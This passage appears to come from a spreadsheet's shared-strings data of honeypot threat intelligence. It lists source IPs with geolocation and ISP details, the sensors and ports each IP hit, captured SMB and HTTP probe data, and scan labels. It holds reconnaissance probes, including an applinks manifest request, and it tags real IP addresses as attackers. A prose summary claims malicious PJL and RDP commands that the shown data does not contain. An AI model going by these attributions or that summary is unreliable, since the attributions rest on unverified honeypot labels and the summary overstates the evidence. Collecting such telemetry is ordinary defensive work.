    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,1376)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,22080)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,25369)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,23953)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,2874)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,10299)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,46107)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,38118)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,55753)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,62963)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,12148)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,41952)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,42933)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,14103)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,64486)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,24582)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,11260)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,29305)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,29241)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,48073)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,27735)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,19780)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,21013)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,245)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,31404)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,4700)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,50752)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,12027)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,37684)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,38917)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,44303)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,5998)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,31890)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,37544)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,62592)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,52291)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,53743)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,13580)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,19215)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,19414)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,26349)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,51023)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,63228)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,20666)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,27664)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,33981)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,49768)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,50058)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,50550)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,36753)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,13084)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,16795)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,35641)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,35753)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (196.188.51.244,48425)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:c4bc:33f4</t>
  </si>
  <si>
    <t>1fa51209105b5dc5f954a8a108743127</t>
  </si>
  <si>
    <t>116.72.60.178</t>
  </si>
  <si>
    <t>::ffff:7448:3cb2</t>
  </si>
  <si>
    <t>56c1a4542b6d217b50acde209a234b67</t>
  </si>
  <si>
    <t>103.41.250.231</t>
  </si>
  <si>
    <t>-6.23003</t>
  </si>
  <si>
    <t>106.799</t>
  </si>
  <si>
    <t>PT Moores Rowland Indonesia</t>
  </si>
  <si>
    <t>::ffff:6729:fae7</t>
  </si>
  <si>
    <t>aeb7d8d670ce5e72b2b8df7e6b159639</t>
  </si>
  <si>
    <t>46.167.152.192</t>
  </si>
  <si>
    <t>Tajrīsh (District 1)</t>
  </si>
  <si>
    <t>113514</t>
  </si>
  <si>
    <t>35.7952</t>
  </si>
  <si>
    <t>51.4323</t>
  </si>
  <si>
    <t>16322</t>
  </si>
  <si>
    <t>Parsan Lin Co. PJS</t>
  </si>
  <si>
    <t>Dadeh Gostar Asr Novin P.J.S. Co</t>
  </si>
  <si>
    <t>Dadeh Gostar Asr Novin P.J.S. Co.</t>
  </si>
  <si>
    <t>::ffff:2ea7:98c0</t>
  </si>
  <si>
    <t>072cfcef5bd2c48a554a6b2d4eac08c2</t>
  </si>
  <si>
    <t>117.214.72.214</t>
  </si>
  <si>
    <t>::ffff:75d6:48d6</t>
  </si>
  <si>
    <t>3fdb7eb0230ef3f9d95f4676a62bbaa3</t>
  </si>
  <si>
    <t>114.32.60.185</t>
  </si>
  <si>
    <t>114-32-60-185.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H41</t>
  </si>
  <si>
    <t>::ffff:7220:3cb9</t>
  </si>
  <si>
    <t>846d710fe7c05533888883b499753f01</t>
  </si>
  <si>
    <t>77.85.130.59</t>
  </si>
  <si>
    <t>77-85-130-59.ip.btc-net.bg&amp;&amp;NA</t>
  </si>
  <si>
    <t>42.6975</t>
  </si>
  <si>
    <t>23.3242</t>
  </si>
  <si>
    <t>8866</t>
  </si>
  <si>
    <t>Vivacom Bulgaria EAD</t>
  </si>
  <si>
    <t>BTC-BROADBAND</t>
  </si>
  <si>
    <t>::ffff:4d55:823b</t>
  </si>
  <si>
    <t>be9b4493d7a52f8264779e77b4a200b9</t>
  </si>
  <si>
    <t>117.209.149.188</t>
  </si>
  <si>
    <t>::ffff:75d1:95bc</t>
  </si>
  <si>
    <t>a964631d6cac074f5c023303e931af43</t>
  </si>
  <si>
    <t>103.41.251.197</t>
  </si>
  <si>
    <t>Teluknaga</t>
  </si>
  <si>
    <t>1990589</t>
  </si>
  <si>
    <t>-6.09889</t>
  </si>
  <si>
    <t>106.638</t>
  </si>
  <si>
    <t>2022-11-21</t>
  </si>
  <si>
    <t>IDNIC-MOORESROWLAND-ID</t>
  </si>
  <si>
    <t>::ffff:6729:fbc5</t>
  </si>
  <si>
    <t>e54434b9175f6eacdb9799b2b4a674bd</t>
  </si>
  <si>
    <t>110.77.244.148</t>
  </si>
  <si>
    <t>Buriram</t>
  </si>
  <si>
    <t>Satuek</t>
  </si>
  <si>
    <t>1606378</t>
  </si>
  <si>
    <t>15.297</t>
  </si>
  <si>
    <t>103.292</t>
  </si>
  <si>
    <t>131090</t>
  </si>
  <si>
    <t>CAT Telecom Public Company Limited</t>
  </si>
  <si>
    <t>CAT BBviaOnnet</t>
  </si>
  <si>
    <t>::ffff:6e4d:f494</t>
  </si>
  <si>
    <t>df8043303d56e8e88a4b3936614544ac</t>
  </si>
  <si>
    <t>14.241.80.106</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;1433&amp;&amp;33026</t>
  </si>
  <si>
    <t>::ffff:ef1:506a</t>
  </si>
  <si>
    <t>b9e7631591ecdb563a6b03813c031531</t>
  </si>
  <si>
    <t>103.165.114.100</t>
  </si>
  <si>
    <t>Kolkata (Belgachia)</t>
  </si>
  <si>
    <t>700037</t>
  </si>
  <si>
    <t>22.6056</t>
  </si>
  <si>
    <t>88.386</t>
  </si>
  <si>
    <t>135872</t>
  </si>
  <si>
    <t>GTPL KCBPL BROADBAND PVT LTD</t>
  </si>
  <si>
    <t>Gtpl Kcbpl Broadband PVT LTD</t>
  </si>
  <si>
    <t>Abhishek Cables Private Limited</t>
  </si>
  <si>
    <t>::ffff:67a5:7264</t>
  </si>
  <si>
    <t>bc4a9737849dbc42e18ada11f0eb621b</t>
  </si>
  <si>
    <t>103.229.129.104</t>
  </si>
  <si>
    <t>Prakasam</t>
  </si>
  <si>
    <t>Ongole</t>
  </si>
  <si>
    <t>1261045</t>
  </si>
  <si>
    <t>15.5036</t>
  </si>
  <si>
    <t>80.0445</t>
  </si>
  <si>
    <t>141266</t>
  </si>
  <si>
    <t>Inri Communications Pvt Ltd</t>
  </si>
  <si>
    <t>Access Smart Solutions India Pvt Ltd</t>
  </si>
  <si>
    <t>2014-04-16</t>
  </si>
  <si>
    <t>ACCESSSMART</t>
  </si>
  <si>
    <t>::ffff:67e5:8168</t>
  </si>
  <si>
    <t>25b37e8b0023cfaee71f1fe4ca97d5e6</t>
  </si>
  <si>
    <t>120.57.85.39</t>
  </si>
  <si>
    <t>::ffff:7839:5527</t>
  </si>
  <si>
    <t>3d7e0122190127aa934df1e6c988519a</t>
  </si>
  <si>
    <t>171.246.88.197</t>
  </si>
  <si>
    <t>::ffff:abf6:58c5</t>
  </si>
  <si>
    <t>8874ff2ed3d6ac9e3e550e5451b82f13</t>
  </si>
  <si>
    <t>103.154.142.35</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;64078&amp;&amp;80&amp;&amp;24354&amp;&amp;1433&amp;&amp;3306&amp;&amp;445</t>
  </si>
  <si>
    <t>-6.20309</t>
  </si>
  <si>
    <t>131111</t>
  </si>
  <si>
    <t>PT Mora Telematika Indonesia</t>
  </si>
  <si>
    <t>MORATELINDONAP</t>
  </si>
  <si>
    <t>2020-08-12</t>
  </si>
  <si>
    <t>CEPATNET-ID</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.154.142.35,55152)}&amp;&amp;{Data_SMB:Incoming connection (103.154.142.35,55478)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.154.142.35,52203)}&amp;&amp;{Data_SMB:Incoming connection (103.154.142.35,52676)}&amp;&amp;{Data_SMB:Incoming connection (103.154.142.35,64233)}&amp;&amp;{Data_SMB:Incoming connection (103.154.142.35,64815)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.154.142.35,52440)}&amp;&amp;{Data_SMB:Incoming connection (103.154.142.35,53192)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:679a:8e23</t>
  </si>
  <si>
    <t>982bdacb8bd642ed5aa40e05afc529b1</t>
  </si>
  <si>
    <t>211.225.41.55</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_POP3_H6&amp;&amp;SMA-LAB_POSTGRES_H3&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_VNC_H3&amp;&amp;SMA-LAB_SMB_H41&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;55470&amp;&amp;55432&amp;&amp;55451&amp;&amp;55485&amp;&amp;NA&amp;&amp;110&amp;&amp;5432&amp;&amp;1080&amp;&amp;9100&amp;&amp;5900&amp;&amp;445&amp;&amp;29711&amp;&amp;80</t>
  </si>
  <si>
    <t>37.3644</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:d3e1:2937</t>
  </si>
  <si>
    <t>3a5a4200a04751450e9a8b3976229173</t>
  </si>
  <si>
    <t>1.231.222.26</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;57102&amp;&amp;80&amp;&amp;23</t>
  </si>
  <si>
    <t>GET&amp;&amp;connection&amp;&amp;login&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Connection': 'close', 'Host': '127.0.0.1', 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}</t>
  </si>
  <si>
    <t>::ffff:1e7:de1a</t>
  </si>
  <si>
    <t>658c8ab75ca54c5659ec1b5ce22c63a7</t>
  </si>
  <si>
    <t>112.167.232.96</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_SSH_H11&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H44</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;445&amp;&amp;1405&amp;&amp;NA&amp;&amp;9100&amp;&amp;1456</t>
  </si>
  <si>
    <t>43</t>
  </si>
  <si>
    <t>North Chungcheong</t>
  </si>
  <si>
    <t>Jeungpyeong-gun</t>
  </si>
  <si>
    <t>Jeungpyeong-gun (Jeungpyeong-eup)</t>
  </si>
  <si>
    <t>8419683</t>
  </si>
  <si>
    <t>36.7669</t>
  </si>
  <si>
    <t>127.604</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:70a7:e860</t>
  </si>
  <si>
    <t>It appears that a threat actor is performing reconnaissance and gathering information about various network services, including DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and others. The attacker is sending probes to these services, attempting to connect and gather information about the systems and networks they are targeting.</t>
  </si>
  <si>
    <t xml:space="preserve">The threat actor seems to be interested in exploiting vulnerabilities in these services, as evidenced by the presence of malicious commands and scripts being sent over some protocols (such as PJL and RDP). </t>
  </si>
  <si>
    <t>9b513b3810f8f6f969e58489189391fd</t>
  </si>
  <si>
    <t>27.255.132.4</t>
  </si>
  <si>
    <t>::ffff:1bff:8404</t>
  </si>
  <si>
    <t>4b7d94679755b06400ae5b2360a661d7</t>
  </si>
  <si>
    <t>194.187.176.172</t>
  </si>
  <si>
    <t>SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_IMAP_HC1</t>
  </si>
  <si>
    <t>1521&amp;&amp;143&amp;&amp;443&amp;&amp;3389&amp;&amp;23&amp;&amp;5432&amp;&amp;3306&amp;&amp;80&amp;&amp;NA&amp;&amp;6379</t>
  </si>
  <si>
    <t>{Data_ORACLE:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;NA&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '103.113.68.70', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36', 'method': 'GET', 'uri': '/rest/applinks/1.0/manifest'}}&amp;&amp;{Data_REDIS:NA}</t>
  </si>
  <si>
    <t>::ffff:c2bb:b0ac</t>
  </si>
  <si>
    <t>Redis Scan</t>
  </si>
  <si>
    <t>55ef24f151bccc8f2ffe9083eebe55dd</t>
  </si>
  <si>
    <t>115.244.235.134</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H28&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;34133&amp;&amp;38048&amp;&amp;1433</t>
  </si>
  <si>
    <t>::ffff:73f4:eb86</t>
  </si>
  <si>
    <t>c09afbba8015233a34dea816218c5da0</t>
  </si>
  <si>
    <t>175.111.182.99</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>Noida</t>
  </si>
  <si>
    <t>28.5355</t>
  </si>
  <si>
    <t>77.391</t>
  </si>
  <si>
    <t>133647</t>
  </si>
  <si>
    <t>ELXIRE DATA SERVICES PVT. LTD.</t>
  </si>
  <si>
    <t>::ffff:af6f:b663</t>
  </si>
  <si>
    <t>0a861929ac87ec74b1ee77362289919d</t>
  </si>
  <si>
    <t>172.74.6.199</t>
  </si>
  <si>
    <t>syn-172-074-006-199.res.spectrum.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38</t>
  </si>
  <si>
    <t>Wilson</t>
  </si>
  <si>
    <t>4499389</t>
  </si>
  <si>
    <t>27893</t>
  </si>
  <si>
    <t>35.7213</t>
  </si>
  <si>
    <t>-77.9155</t>
  </si>
  <si>
    <t>11426</t>
  </si>
  <si>
    <t>Charter Communications Inc</t>
  </si>
  <si>
    <t>::ffff:ac4a:6c7</t>
  </si>
  <si>
    <t>f91213556fb1167b56cb8b1fb864d070</t>
  </si>
  <si>
    <t>117.248.174.101</t>
  </si>
  <si>
    <t>::ffff:75f8:ae65</t>
  </si>
  <si>
    <t>6ade1a162e7d07e1c53c1d551900adda</t>
  </si>
  <si>
    <t>117.209.93.160</t>
  </si>
  <si>
    <t>::ffff:75d1:5da0</t>
  </si>
  <si>
    <t>f3c55a04ca00b5946e7f51ba3779efb0</t>
  </si>
  <si>
    <t>115.187.30.154</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H21&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_MYSQL_H2&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;55401&amp;&amp;445&amp;&amp;1433&amp;&amp;3306</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (115.187.30.154,50931)}&amp;&amp;{Data_SMB:Incoming connection (115.187.30.154,51549)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (115.187.30.154,54582)}&amp;&amp;{Data_SMB:Incoming connection (115.187.30.154,55213)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (115.187.30.154,58657)}&amp;&amp;{Data_SMB:Incoming connection (115.187.30.154,59076)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:73bb:1e9a</t>
  </si>
  <si>
    <t>Scanning attempt</t>
  </si>
  <si>
    <t>289a2a4a0a5e2ca82ba03c5b1ea178dc</t>
  </si>
  <si>
    <t>117.192.72.173</t>
  </si>
  <si>
    <t>::ffff:75c0:48ad</t>
  </si>
  <si>
    <t>09fd8cd948c01abb36c7a14dc01152b8</t>
  </si>
  <si>
    <t>115.97.133.171</t>
  </si>
  <si>
    <t>::ffff:7361:85ab</t>
  </si>
  <si>
    <t>483e9734b53c778215257e9503f9277e</t>
  </si>
  <si>
    <t>103.158.163.177</t>
  </si>
  <si>
    <t>-6.19504</t>
  </si>
  <si>
    <t>Iforte</t>
  </si>
  <si>
    <t>::ffff:679e:a3b1</t>
  </si>
  <si>
    <t>b204133ebf2cb341558c1bc146b9c9b9</t>
  </si>
  <si>
    <t>117.192.27.173</t>
  </si>
  <si>
    <t>::ffff:75c0:1bad</t>
  </si>
  <si>
    <t>ae72fc8fe13a8ca650ec0b51c6fd68ad</t>
  </si>
  <si>
    <t>62.221.148.240</t>
  </si>
  <si>
    <t>Kardzhali</t>
  </si>
  <si>
    <t>729794</t>
  </si>
  <si>
    <t>6600</t>
  </si>
  <si>
    <t>41.65</t>
  </si>
  <si>
    <t>25.3667</t>
  </si>
  <si>
    <t>13124</t>
  </si>
  <si>
